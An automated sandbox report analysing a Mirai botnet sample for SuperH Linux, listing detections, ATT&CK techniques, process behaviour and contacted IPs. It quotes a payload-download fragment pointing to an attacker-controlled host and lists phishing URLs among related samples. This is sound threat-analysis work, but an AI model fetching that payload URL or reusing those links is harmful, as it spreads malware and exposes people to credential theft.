              Source: Yara matchFile source: 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xd.sh4.elf PID: 5414, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xd.sh4.elf PID: 5419, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xd.sh4.elf PID: 5421, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xd.sh4.elf PID: 5423, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xd.sh4.elf PID: 5425, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xd.sh4.elf PID: 5427, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xd.sh4.elf PID: 5430, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: xd.sh4.elf, type: SAMPLE
              Source: Yara matchFile source: 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xd.sh4.elf PID: 5414, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xd.sh4.elf PID: 5419, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xd.sh4.elf PID: 5421, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xd.sh4.elf PID: 5423, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xd.sh4.elf PID: 5425, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xd.sh4.elf PID: 5427, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xd.sh4.elf PID: 5430, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		Valid AccountsWindows Management Instrumentation1
              Scripting              		Path Interception1
              File and Directory Permissions Modification              		1
              OS Credential Dumping              		11
              Security Software Discovery              		Remote ServicesData from Local System1
              Non-Standard Port              		Exfiltration Over Other Network Medium1
              Service Stop
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Disable or Modify Tools              		LSASS Memory1
              File and Directory Discovery              		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Indicator Removal              		Security Account Manager1
              System Information Discovery              		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              File Deletion              		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

              Malware Configuration

              No configs have been found

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1654967 Sample: xd.sh4.elf Startdate: 02/04/2025 Architecture: LINUX Score: 100 54 90.242.7.190, 23 VodafoneGB United Kingdom 2->54 56 195.15.230.248, 23 VTX-NETWORKCH Switzerland 2->56 58 98 other IPs or domains 2->58 64 Malicious sample detected (through community Yara rule) 2->64 66 Antivirus / Scanner detection for submitted sample 2->66 68 Multi AV Scanner detection for submitted file 2->68 70 Yara detected Mirai 2->70 8 xd.sh4.elf 2->8         started        10 systemd gpu-manager 2->10         started        12 gvfsd-fuse fusermount 2->12         started        15 44 other processes 2->15 signatures3 process4 signatures5 17 xd.sh4.elf 8->17         started        20 xd.sh4.elf 8->20         started        22 xd.sh4.elf 8->22         started        24 gpu-manager sh 10->24         started        26 gpu-manager sh 10->26         started        28 gpu-manager sh 10->28         started        32 5 other processes 10->32 72 Sample reads /proc/mounts (often used for finding a writable filesystem) 12->72 30 generate-config pkill 15->30         started        34 40 other processes 15->34 process6 signatures7 60 Sample tries to kill multiple processes (SIGKILL) 17->60 62 Sample deletes itself 17->62 36 xd.sh4.elf 20->36         started        50 3 other processes 20->50 38 sh grep 24->38         started        40 sh grep 26->40         started        42 sh grep 28->42         started        44 sh grep 32->44         started        46 sh grep 32->46         started        48 sh grep 32->48         started        52 2 other processes 32->52 process8

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              xd.sh4.elf63%VirustotalBrowse
              xd.sh4.elf64%ReversingLabsLinux.Trojan.Mirai
              xd.sh4.elf100%AviraLINUX/Mirai.bonb

              Dropped Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://213.209.129.92/d/xd.arm7;chmod0%Avira URL Cloudsafe

              Domains and IPs

              Download Network PCAP: filteredfull

              Contacted Domains

              No contacted domains info
              NameSourceMaliciousAntivirus DetectionReputation
              http://213.209.129.92/d/xd.arm7;chmodxd.sh4.elffalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              18.23.138.219
              		unknownUnited States
              		3MIT-GATEWAYSUSfalse
              1.131.92.134
              		unknownAustralia
              		1221ASN-TELSTRATelstraCorporationLtdAUfalse
              9.140.25.126
              		unknownUnited States
              		3356LEVEL3USfalse
              203.142.155.151
              		unknownAustralia
              		9443VOCUS-RETAIL-AUVocusRetailAUfalse
              76.36.89.203
              		unknownUnited States
              		18494CENTURYLINK-LEGACY-EMBARQ-WRBGUSfalse
              71.117.0.55
              		unknownUnited States
              		701UUNETUSfalse
              191.46.129.2
              		unknownBrazil
              		7738TelemarNorteLesteSABRfalse
              35.224.125.126
              		unknownUnited States
              		15169GOOGLEUSfalse
              211.212.76.94
              		unknownKorea Republic of
              		9318SKB-ASSKBroadbandCoLtdKRfalse
              141.163.163.151
              		unknownUnited Kingdom
              		786JANETJiscServicesLimitedGBfalse
              253.249.54.108
              		unknownReserved
              		unknownunknownfalse
              157.230.181.161
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUSfalse
              107.64.221.118
              		unknownUnited States
              		7018ATT-INTERNET4USfalse
              148.127.109.169
              		unknownUnited States
              		18819ENTERGY-CORP-USfalse
              223.51.198.111
              		unknownKorea Republic of
              		9644SKTELECOM-NET-ASSKTelecomKRfalse
              193.185.140.67
              		unknownFinland
              		719ELISA-ASHelsinkiFinlandEUfalse
              98.91.152.18
              		unknownUnited States
              		11351TWC-11351-NORTHEASTUSfalse
              91.26.168.171
              		unknownGermany
              		3320DTAGInternetserviceprovideroperationsDEfalse
              113.68.200.52
              		unknownChina
              		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
              254.24.37.146
              		unknownReserved
              		unknownunknownfalse
              152.39.57.159
              		unknownUnited States
              		81NCRENUSfalse
              248.78.199.92
              		unknownReserved
              		unknownunknownfalse
              222.108.206.164
              		unknownKorea Republic of
              		4766KIXS-AS-KRKoreaTelecomKRfalse
              240.50.47.31
              		unknownReserved
              		unknownunknownfalse
              178.183.191.180
              		unknownPoland
              		5588GTSCEGTSCentralEuropeAntelGermanyCZfalse
              188.59.192.117
              		unknownTurkey
              		16135TURKCELL-ASTurkcellASTRfalse
              103.238.148.44
              		unknownMalaysia
              		45595PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPKfalse
              203.207.159.169
              		unknownChina
              		17964DXTNETBeijingDian-Xin-TongNetworkTechnologiesCoLtdfalse
              206.95.116.52
              		unknownUnited States
              		3549LVLT-3549USfalse
              123.64.13.116
              		unknownChina
              		9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
              156.194.25.68
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              82.108.164.163
              		unknownUnited Kingdom
              		4589EASYNETEasynetGlobalServicesEUfalse
              136.104.164.124
              		unknownUnited States
              		60311ONEFMCHfalse
              128.4.151.94
              		unknownUnited States
              		2UDEL-DCNUSfalse
              175.74.49.93
              		unknownChina
              		9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
              84.245.129.125
              		unknownGermany
              		20676PLUSNETDEfalse
              71.248.210.125
              		unknownUnited States
              		701UUNETUSfalse
              90.242.7.190
              		unknownUnited Kingdom
              		5378VodafoneGBfalse
              149.228.162.41
              		unknownGermany
              		702UUNETUSfalse
              255.162.237.222
              		unknownReserved
              		unknownunknownfalse
              195.55.88.62
              		unknownSpain
              		3352TELEFONICA_DE_ESPANAESfalse
              19.209.19.163
              		unknownUnited States
              		3MIT-GATEWAYSUSfalse
              172.246.152.35
              		unknownUnited States
              		18978ENZUINC-USfalse
              161.153.127.76
              		unknownUnited States
              		9328DATACOM-AUDATACOMSYSTEMSAUPTYLTDAUfalse
              120.204.67.235
              		unknownChina
              		24400CMNET-V4SHANGHAI-AS-APShanghaiMobileCommunicationsCoLtfalse
              165.17.51.26
              		unknownunknown
              		37284Aljeel-netLYfalse
              57.94.92.1
              		unknownBelgium
              		51964ORANGE-BUSINESS-SERVICES-IPSN-ASNFRfalse
              199.55.214.174
              		unknownUnited States
              		398192ARDOT-NET-01USfalse
              9.73.33.143
              		unknownUnited States
              		3356LEVEL3USfalse
              152.177.102.169
              		unknownUnited States
              		701UUNETUSfalse
              5.167.247.165
              		unknownRussian Federation
              		51604EKAT-ASRUfalse
              219.78.245.146
              		unknownHong Kong
              		4760HKTIMS-APHKTLimitedHKfalse
              251.155.56.22
              		unknownReserved
              		unknownunknownfalse
              182.226.239.207
              		unknownKorea Republic of
              		17858POWERVIS-AS-KRLGPOWERCOMMKRfalse
              19.196.15.45
              		unknownUnited States
              		3MIT-GATEWAYSUSfalse
              211.68.251.108
              		unknownChina
              		4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
              217.172.131.73
              		unknownUnited Kingdom
              		33854HOSTIT-AS-NNGBfalse
              5.124.236.196
              		unknownIran (ISLAMIC Republic Of)
              		44244IRANCELL-ASIRfalse
              105.85.237.206
              		unknownEgypt
              		36992ETISALAT-MISREGfalse
              125.213.204.39
              		unknownAfghanistan
              		17411IO-GLOBAL-APIoGlobalServicesPvtLimitedAFfalse
              162.1.112.64
              		unknownUnited States
              		27353IUHEALTH-ASNUSfalse
              183.157.118.198
              		unknownChina
              		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
              61.103.199.165
              		unknownKorea Republic of
              		9457DREAMX-ASDREAMLINECOKRfalse
              86.126.217.138
              		unknownRomania
              		8708RCS-RDS73-75DrStaicoviciROfalse
              171.47.160.33
              		unknownChina
              		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
              19.210.11.41
              		unknownUnited States
              		3MIT-GATEWAYSUSfalse
              46.97.23.38
              		unknownRomania
              		12302VODAFONE_ROCharlesdeGaullenr15ROfalse
              63.124.114.177
              		unknownUnited States
              		701UUNETUSfalse
              174.37.177.44
              		unknownUnited States
              		36351SOFTLAYERUSfalse
              116.212.11.48
              		unknownKorea Republic of
              		45361JCN-AS-KRUlsanJung-AngBroadcastingNetworkKRfalse
              40.24.14.62
              		unknownUnited States
              		4249LILLY-ASUSfalse
              173.93.73.222
              		unknownUnited States
              		11426TWC-11426-CAROLINASUSfalse
              254.129.63.29
              		unknownReserved
              		unknownunknownfalse
              195.15.230.248
              		unknownSwitzerland
              		12350VTX-NETWORKCHfalse
              118.59.160.166
              		unknownKorea Republic of
              		4766KIXS-AS-KRKoreaTelecomKRfalse
              79.176.182.81
              		unknownIsrael
              		8551BEZEQ-INTERNATIONAL-ASBezeqintInternetBackboneILfalse
              105.132.203.33
              		unknownMorocco
              		6713IAM-ASMAfalse
              213.209.129.92
              		unknownGermany
              		42821RAPIDNET-DEHaunstetterStr19DEfalse
              19.57.167.43
              		unknownUnited States
              		3MIT-GATEWAYSUSfalse
              9.7.255.81
              		unknownUnited States
              		3356LEVEL3USfalse
              211.153.203.5
              		unknownChina
              		4847CNIX-APChinaNetworksInter-ExchangeCNfalse
              178.177.6.54
              		unknownRussian Federation
              		25159SONICDUO-ASRUfalse
              98.134.53.71
              		unknownUnited States
              		8473BAHNHOFhttpwwwbahnhofnetSEfalse
              44.233.241.155
              		unknownUnited States
              		16509AMAZON-02USfalse
              188.179.236.76
              		unknownDenmark
              		3292TDCTDCASDKfalse
              192.143.250.212
              		unknownSouth Africa
              		37611AfrihostZAfalse
              107.226.200.178
              		unknownUnited States
              		7018ATT-INTERNET4USfalse
              81.46.48.249
              		unknownSpain
              		3352TELEFONICA_DE_ESPANAESfalse
              172.143.133.21
              		unknownUnited States
              		7018ATT-INTERNET4USfalse
              40.96.18.177
              		unknownUnited States
              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              189.36.212.25
              		unknownBrazil
              		28296AcessaTelecomunicacoesLtdaBRfalse
              85.53.45.253
              		unknownSpain
              		12479UNI2-ASESfalse
              70.182.246.7
              		unknownUnited States
              		22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
              208.198.22.217
              		unknownUnited States
              		1699ANS-1699-ASUSfalse
              205.228.153.136
              		unknownUnited States
              		5049MORGAN-ASNUSfalse
              135.6.73.133
              		unknownUnited States
              		10455LUCENT-CIOUSfalse
              117.135.21.34
              		unknownChina
              		24400CMNET-V4SHANGHAI-AS-APShanghaiMobileCommunicationsCoLtfalse
              82.100.126.238
              		unknownSweden
              		13189LIDEROLideroNetworkSEfalse
              126.184.106.140
              		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
              123.4.226.190
              		unknownChina
              		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              VOCUS-RETAIL-AUVocusRetailAUarm5.elfGet hashmaliciousUnknownBrowse
              • 139.221.223.92
              resgod.arm.elfGet hashmaliciousMiraiBrowse
              • 104.100.148.228
              i686.elfGet hashmaliciousMiraiBrowse
              • 139.218.117.180
              hoho.i686.elfGet hashmaliciousUnknownBrowse
              • 122.149.110.193
              jkse.arm5.elfGet hashmaliciousUnknownBrowse
              • 211.27.75.71
              jkse.x86.elfGet hashmaliciousUnknownBrowse
              • 211.27.124.31
              splarm5.elfGet hashmaliciousUnknownBrowse
              • 116.245.153.230
              nklarm5.elfGet hashmaliciousUnknownBrowse
              • 112.213.162.115
              jklppc.elfGet hashmaliciousUnknownBrowse
              • 116.244.6.162
              nklx86.elfGet hashmaliciousUnknownBrowse
              • 111.220.116.144
              MIT-GATEWAYSUShttps://supplier.metaenterprise.com/supplier-connect/homeGet hashmaliciousUnknownBrowse
              • 18.117.34.67
              Advance-auto_receipt019.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
              • 18.164.124.96
              https://sprayfoamsys.comGet hashmaliciousUnknownBrowse
              • 18.164.96.87
              https://u7990385.ct.sendgrid.net/ls/click?upn=u001.oZ6GXC16Ztdw1ob-2F3C5yow-2FsK2YC4S8s269h9OLgp-2FGcQesCtXDXKgCEAF90Sa3OCy4-2F8kjpNgZm-2BgZsMdS1bfz52FcnP1TWB9R0E7-2F8Qnsc-2FB1JorLOHf8hisusJ4QRFAdkzlPlCtQyWV7XFlsorDlGs-2FXFaZtfILNk2CGzhOAh-2FplOBpAwbo8FEcNO6XU5yHNlcED7s9R6vn8NXl8BHGMXjZTaDIh3ednS0qpEYQlkjgdh04lqNlwUYQgfcZcrKvrl_TS1MykV2MfY4erwoSL54Fxruz3oW8XjCJ-2BoN9Zik9lnfuVgJcpfWzpZ2kemqNfDwpv0iQt9S4uySN3znm-2BVhjBDFXpavPbhp3p63OqMKE14K-2B87bgvIyQeft2IA5x5DXtXyea4x7LL3ebnAt5F3iws4moF4GGYx8i-2BOXu7XZjWH0GMPc0EM6lkOWGk0vwG-2FjwXFvt1n9jGbqE-2FkvlQWBREfPj3XI47wSs0OcIXHID47RBGllKyjoFHcTRVuRkeBPBjN4gewg0w8p4bShL-2Fr1YdURDfyviYbMM74eBBFCl2-2Bkr7ZOyuk-2FIHWpgRPOs9m54a1Lfkrfus2zBhCAWlGWoQpBcv6cXnG2svD8IGNmOfy9bqAH2OADQRmihLcQD9oUk5O-2BoVDui4816AM-2FXopyV9cYB0wzX6vtrT4EnW7jL7NESjGPrz7mdcXhfoIZCp4eInnzYxTQ8j8yFsGJ9bUK-2B8vuDffEncAbiSfBMicEq9uiA4Wk3TCDg6UfJl1sr76JQ2RYA4z5fFVT25Euw-2FCbwhWuVAyKUdFPY93NzmJl7ZYlNDPVrAclSb75dsk0rqhTu3ZTtC2bZEtzEALRsZQY4b221BytJlaaeRyyvP75v6ZmCcG7-2Bcl4WZGtsiW4-2FkDth6QE24hsfcLoAtA7pxT9uq-2BmqXz2quvSyk9-2Bm90ngMUEFVmzqJ2woki8fUYvKvsXhpNbl4YAk-2FjCY1SojpHp0OB5Ag9NAjiZCUsHiuxPmqFxotpjfwqx9h-2FIdr9skeRgttV-2FHbMYXeQfXe3eEepIS3L8j4eq-2FvVf5UOGVfefW9MIJOvr9g-2F-2F-2F1x8AnFuX1sjI30oQ-2BqYxjqJrVL0mKpiwZdEJzkC9CnhOyGpYXHtCUMTxDReigPu4J7-2B1wU5hRs85XHg597OD3ghdHNIq2Gd-2BKTtGqA99VnR9kFt3j98yvakP93-2Fxhk-2FLX4oMZzWfEjWvyJEpL17yKlwhsowtC9wvtyctQ09OLV1taCdtJx4wgtsp9tsqzNnyHObFTFv3zLFGet hashmaliciousUnknownBrowse
              • 18.173.132.94
              -Lysisfinancial_Executives_Schedule 6cLKF4B .svgGet hashmaliciousHTMLPhisherBrowse
              • 18.164.116.117
              http://daugavpils.pilseta24.lv/linkredirect/?link=https%3A%2F%2Fmujicconstruction.com%2Fjustdoitforyou%2F123%2FbGF1cmEuYmVyZ21hbkBwb3N0bm9yZC5jb20=&referer=daugavpils.pilseta24.lv%2Fzina%3Fslug%3Deccal-briketes-un-apkures-granulas-ar-lielisku-kvalitati-pievilcigu-cenu-videi-draudzigs-un-izd-8c175fc171&additional_params=%7B%22company_orig_id%22%3A%22267661%22%2C%22object_country_id%22%3A%22lv%22%2C%22referer_layout_type%22%3A%22SR%22%2C%22bannerinfo%22%3A%22%7B%5C%22key%5C%22%3A%5C%22%5C%5C%5C%22Apbed%5C%5Cu012b%5C%5Cu0161anas+nams-krematorija%5C%5C%5C%22%2C+SIA%7C2020-09-11%7C2021-08-23%7Cdaugavpils+p24+lielais+baneris%7Chttps%3A%5C%5C%5C%2F%5C%5C%5C%2Fwww.krematorijariga.lv%5C%5C%5C%2F%7C%7Cupload%5C%5C%5C%2F267661%5C%5C%5C%2Fbaners%5C%5C%5C%2F1184_krematorija_980x90.gif%7Clva%7C267661%7C980%7C90%7C%7C0%7C0%7C%7C0%7C0%7C%5C%22%2C%5C%22doc_count%5C%22%3A1%2C%5C%22key0%5C%22%3A%5C%22%5C%5C%5C%22Apbed%5C%5Cu012b%5C%5Cu0161anas+nams-krematorija%5C%5C%5C%22%2C+SIA%5C%22%2C%5C%22key1%5C%22%3A%5C%222020-09-11%5C%22%2C%5C%22key2%5C%22%3A%5C%222021-08-23%5C%22%2C%5C%22key3%5C%22%3A%5C%22daugavpils+p24+lielais+baneris%5C%22%2C%5C%22key4%5C%22%3A%5C%22https%3A%5C%5C%5C%2F%5C%5C%5C%2Fwww.krematorijariga.lv%5C%5C%5C%2F%5C%22%2C%5C%22key5%5C%22%3A%5C%22%5C%22%2C%5C%22key6%5C%22%3A%5C%22upload%5C%5C%5C%2F267661%5C%5C%5C%2Fbaners%5C%5C%5C%2F1184_krematorija_980x90.gif%5C%22%2C%5C%22key7%5C%22%3A%5C%22lva%5C%22%2C%5C%22key8%5C%22%3A%5C%22267661%5C%22%2C%5C%22key9%5C%22%3A%5C%22980%5C%22%2C%5C%22key10%5C%22%3A%5C%2290%5C%22%2C%5C%22key11%5C%22%3A%5C%22%5C%22%2C%5C%22key12%5C%22%3A%5C%220%5C%22%2C%5C%22key13%5C%22%3A%5C%220%5C%22%2C%5C%22key14%5C%22%3A%5C%22%5C%22%2C%5C%22key15%5C%22%3A%5C%220%5C%22%2C%5C%22key16%5C%22%3A%5C%220%5C%22%2C%5C%22key17%5C%22%3A%5C%22%5C%22%7D%22%7D&control=494d2e7146aade77cb8a9ef0fd1fd133Get hashmaliciousHTMLPhisherBrowse
              • 18.164.116.109
              https://bpc.ldpkkacq.es/MgZjXO/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
              • 18.164.124.91
              https://app.capacities.io/home/63046a91-df50-4ebb-84ab-5f0bf1208f6fGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
              • 18.164.124.11
              https://app.salesforceiq.com/r?target=614a51825fca485d60691526&t=AFwhZf0cvVSRkxL_ZnKrPopBohu0BY8RxIvIio7deEr8IYfLj7_CzJhp0DG7qixuIe9S9P0aHZw30z0m58R-sX4GIJ0lhUgHQXCwgykuzYKc_TIaxSP3Z0ObCXElS3mCv7bs1E4pjVUI&url=https://TyW5.ArcxticVision.ru/u3v4jfQ-4jfQ/$eatme@shiitehole.comGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
              • 18.164.124.110
              utorrent_installer.exeGet hashmaliciousUnknownBrowse
              • 18.164.96.127
              ASN-TELSTRATelstraCorporationLtdAUxd.mips.elfGet hashmaliciousMiraiBrowse
              • 60.226.249.216
              xd.powerpc-440fp.elfGet hashmaliciousMiraiBrowse
              • 1.120.235.183
              xd.arm.elfGet hashmaliciousMiraiBrowse
              • 138.217.158.110
              xd.spc.elfGet hashmaliciousMiraiBrowse
              • 120.153.228.47
              ppc.elfGet hashmaliciousMiraiBrowse
              • 121.214.55.176
              mips.elfGet hashmaliciousUnknownBrowse
              • 120.158.97.80
              m68k.elfGet hashmaliciousUnknownBrowse
              • 137.147.88.56
              arm7.elfGet hashmaliciousMiraiBrowse
              • 58.166.71.86
              spc.elfGet hashmaliciousUnknownBrowse
              • 110.149.15.81
              boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
              • 121.211.158.148
              LEVEL3USutorrent_installer.exeGet hashmaliciousUnknownBrowse
              • 4.150.155.223
              xd.mips.elfGet hashmaliciousMiraiBrowse
              • 4.243.233.137
              xd.powerpc-440fp.elfGet hashmaliciousMiraiBrowse
              • 4.78.223.144
              xd.arm.elfGet hashmaliciousMiraiBrowse
              • 8.126.249.250
              xd.ppc.elfGet hashmaliciousMiraiBrowse
              • 9.204.255.240
              xd.x86.elfGet hashmaliciousMiraiBrowse
              • 4.225.26.173
              xd.arm7.elfGet hashmaliciousMiraiBrowse
              • 9.72.135.5
              xd.i686.elfGet hashmaliciousMiraiBrowse
              • 204.161.102.43
              xd.sh4.elfGet hashmaliciousMiraiBrowse
              • 9.255.204.216
              xd.spc.elfGet hashmaliciousMiraiBrowse
              • 4.246.180.98

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              Process:/usr/bin/pulseaudio
              File Type:ASCII text
              Category:dropped
              Size (bytes):10
              Entropy (8bit):2.9219280948873623
              Encrypted:false
              SSDEEP:3:5bkPn:pkP
              MD5:FF001A15CE15CF062A3704CEA2991B5F
              SHA1:B06F6855F376C3245B82212AC73ADED55DFE5DEF
              SHA-256:C54830B41ECFA1B6FBDC30397188DDA86B7B200E62AEAC21AE694A6192DCC38A
              SHA-512:65EBF7C31F6F65713CE01B38A112E97D0AE64A6BD1DA40CE4C1B998F10CD3912EE1A48BB2B279B24493062118AAB3B8753742E2AF28E56A31A7AAB27DE80E7BF
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:auto_null.
              Process:/usr/bin/pulseaudio
              File Type:ASCII text
              Category:dropped
              Size (bytes):18
              Entropy (8bit):3.4613201402110088
              Encrypted:false
              SSDEEP:3:5bkrIZsXvn:pkckv
              MD5:28FE6435F34B3367707BB1C5D5F6B430
              SHA1:EB8FE2D16BD6BBCCE106C94E4D284543B2573CF6
              SHA-256:721A37C69E555799B41D308849E8F8125441883AB021B723FED90A9B744F36C0
              SHA-512:6B6AB7C0979629D0FEF6BE47C5C6BCC367EDD0AAE3FC973F4DE2FD5F0A819C89E7656DB65D453B1B5398E54012B27EDFE02894AD87A7E0AF3A9C5F2EB24A9919
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:auto_null.monitor.
              Process:/usr/sbin/gdm3
              File Type:ASCII text
              Category:dropped
              Size (bytes):5
              Entropy (8bit):1.9219280948873623
              Encrypted:false
              SSDEEP:3:FTJ:pJ
              MD5:4B9EDCD22341DC5841FE35D9AF9FBFCD
              SHA1:B3D207B03F3BCBD22B804091508A87436CF78E75
              SHA-256:052D7B13CA45AB68E519E638363A53C402216FD7B7197EBB5330F6B3CB095C9E
              SHA-512:8DC2C15DBD211BA7C43E735BF65ABD1E76BF3666BF748373AB039BCA44F415BA311DF163513B8B0ED948EBE67AF7FC28B9267905867725E1E474AC75A56D3631
              Malicious:false
              Reputation:low
              Preview:5564.
              Process:/usr/bin/pulseaudio
              File Type:ASCII text
              Category:dropped
              Size (bytes):5
              Entropy (8bit):1.9219280948873623
              Encrypted:false
              SSDEEP:3:FWJ:a
              MD5:395BDAB1FC170F96F672C88702BECDEA
              SHA1:128FCC0C1B3F505A98B2C8AA132339F8876306CB
              SHA-256:B44E28E841A10AACF47A89058990C3903E52A000316740F965F486EC6867CC84
              SHA-512:5B80C2E6058C5BC393A3E3C1D52A55D0A49394BE530419872D3E7058000EDDBED05C297FEBD1AAA92AC35D5E16FE0E726EF672FB675419BE716221B31F6C58BF
              Malicious:false
              Reputation:low
              Preview:5534.
              Process:/usr/bin/gpu-manager
              File Type:ASCII text
              Category:dropped
              Size (bytes):25
              Entropy (8bit):2.7550849518197795
              Encrypted:false
              SSDEEP:3:JoT/V9fDVbn:M/V3n
              MD5:078760523943E160756979906B85FB5E
              SHA1:0962643266F4C5537F7D125046F28F21D6DD0C89
              SHA-256:048416AC7A9A99690B8B53718CD39F32F637B55CC8DD8E67E58E5AEF060DD41C
              SHA-512:DEFAAE8F8B54C61A716A0B0B4884358FEB8EB44DFEA01AAA5A687FDA7182792B7DEBB34AA840672EB3B40EB59FD0186749E08E47D181786C7FAA8C8F73F0104D
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:15ad:0405;0000:00:0f:0;1.
              Process:/usr/bin/gpu-manager
              File Type:ASCII text
              Category:dropped
              Size (bytes):1371
              Entropy (8bit):4.8296848499188485
              Encrypted:false
              SSDEEP:24:wPXXX9uV6BNu3WDF3GF3XFFxFFed2uk2HUvJlfWkpPpx7uvvAdow9555cJz:wPXXXe6vejpeC2HUR5WkpPpcvAdow95O
              MD5:3AF77E630DA00B3BE24F4E8AA5D78B13
              SHA1:BCF2D99E002F6DE2413A183227B011CFBEF5673D
              SHA-256:EB1CBBA20845237B4409274D693FEAE13F835274DA3337B7A9D14F4D7FDF9DEA
              SHA-512:8524B1E8A761F962B32F396812099B9B0B2DCF3C9FCA8605424753CFCFF4DC67EDC5EE1D8C91B9C0ED7FAE6BB1E752898B8D514B7C421D1839D6FEDA609C593C
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:log_file: /var/log/gpu-manager.log.last_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.new_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.can't access /run/u-d-c-nvidia-was-loaded file.can't get module info via kmodcan't access /opt/amdgpu-pro/bin/amdgpu-pro-px.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/kernel.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/updates/dkms.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/kernel.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/updates/dkms.Is nvidia loaded? no.Was nvidia unloaded? no.Is nvidia blacklisted? no.Is intel loaded? no.Is radeon loaded? no.Is radeon blacklisted? no.Is amdgpu loaded? no.Is amdgpu blacklisted? no.Is amdgpu versioned? no.Is amdgpu pro stack? no.Is nouveau loaded? no.Is nouveau blacklisted? no.Is nvidia kernel module available? no.Is amdgpu kernel module available? no.Vendor/Device Id: 15ad:405.BusID "PCI:0@0:15:0".Is boot vga? yes.Error: can't acce

              Static File Info

              General

              File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
